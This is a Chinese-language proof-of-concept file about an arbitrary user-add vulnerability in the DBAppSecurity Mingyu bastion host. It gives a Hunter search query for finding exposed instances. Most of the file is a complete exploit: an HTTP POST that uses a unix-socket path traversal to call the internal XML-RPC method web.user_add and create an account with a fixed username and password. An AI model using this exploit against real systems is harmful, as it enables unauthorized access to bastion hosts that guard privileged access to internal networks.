POC/wpoc/安恒/安恒明御堡垒机/安恒堡垒机任意用户添加漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

117 lines
2.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 安恒堡垒机任意用户添加漏洞
# 一、漏洞简介
安恒明御运维审计与风险控制系统简称“DASUSM”是一款基于运维安全管理的理论和实践经验结合各类法律法规如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等对运维审计的要求采用B/S架构集“身份认证Authentication、账户管理Account、控制权限Authorization、日志审计Audit”于一体支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统堡垒机存在任意用户添加漏洞攻击者可利用该漏洞添加用户登录堡垒机。
# 二、影响版本
+ 安恒明御运维审计与风险控制系统
# 三、资产测绘
+ hunter:`app.name=="安恒明御运维审计与风险控制系统"`
![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/cmq6DHY7F_D9I14C/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-574865.png)
+ 首页
![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/cmq6DHY7F_D9I14C/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-116673.png)
# 四、漏洞复现
使用exp添加用户`qaxnb666/Admin123..`
```java
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 1112
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>10.17.1.1</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>qaxnb666</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>yuwe</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Admin123..</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>
```
![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/cmq6DHY7F_D9I14C/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-529529.png)
![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/cmq6DHY7F_D9I14C/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-029750.png)
> 更新: 2024-02-29 23:57:16
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uw8xn0gy2yh82z2w>